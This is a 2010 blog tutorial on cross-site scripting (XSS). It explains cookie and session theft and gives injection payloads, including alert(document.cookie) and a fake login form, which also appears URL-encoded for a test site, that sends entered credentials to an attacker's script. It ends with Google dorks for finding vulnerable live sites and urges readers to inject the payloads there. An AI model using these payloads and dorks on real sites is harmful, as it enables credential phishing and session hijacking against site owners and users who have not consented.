Wednesday, November 3, 2010

|TUT| CROSS SITE SCRIPTING(XSS)

Posted by Shubham Bharadwaj at 11:12 AM

|TUT| CROSS SITE SCRIPTING(XSS)

Cross site scripting is an attack performed on the embedded scripts in a page that get executed on client-side but not on server side.it is the process of injecting Javascript and html for the purpose of stealing critical information like user credentials and important details of the person.The stolen information includes user's cookies and login information mainly.

A cookie is a variable that is used to store login credentials and to keep the user logged in.Whenever your cookies are cleared you can no longer stay logged in any site.On a php powered page the cookie looks like PHPSESSID.Whenever a webpage uses PHPSESSID to authenticate its users,the cookie can be stolen using cross site scripting attack.In this way the attacker can spoof using one cookie and hijack his session.

XSS can be considered as a dangerous exploit as most of the web pages are user interactive.For the purpose of interaction the webpage provides fields for comments,search and even feedback.90% percent of user interactive websites are vunerable to this type of attack though some percentage of sites have a high risk of exploitation. 

For testing XSS you can inject the script like 
Code:
<h1>welcome</h1>
or 
Code:
<script>alert(hello)</script>
into search fields,comment fields and feedback forms.If you find the output of the page which looks like a large heading that reads welcome or an alertbox that say's hello.

To give it a try ,click the link http://testasp.vulnweb.com/Search.asp

Insert the below codes:

Code:
code 1: <h1>XSSED</h1>

code 2: <script>alert("XSSED")</script>

code 3: <img src="URL OF THE IMAGE"></img>

code 4: <br><br>Login to proceed:<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=10 name=login></td></tr><tr><td>Password:</td><td><input type=text length=10 name=password></td></tr></table><input type=submit value=LOGIN></form>

Where the destination.asp can be script that stores the data entered in the fields.

Code:
This code can be injected directly into the url as follows:
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+
the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3C
table%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D
text+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3C
td%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput +type%3Dtext+length%3D20
+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput
+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E

code 5: <script>alert(document.cookie)</script>

To find the vunerable pages we can use some XSS dorks like "inurl:search.php?q="

inurl:com_feedpostold/feedpost.php?url=

inurl:scrapbook.php?id=

inurl:headersearch.php?sid=

inurl:/poll/default.asp?catid=

inurl:/search_results.php?search=

/preaspjobboard//Employee/emp_login.asp?msg1=

pages/match_report.php?mid= pages/match_report.php?mid=

Type any of the dorks into google and input the codes given.
Thanks For Making This Possible! Kindly Bookmark and Share it.

Technorati Digg This Stumble Stumble Facebook Twitter

0 comments:

:)) ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( =))

Post a Comment

Subscribe to: Post Comments (Atom)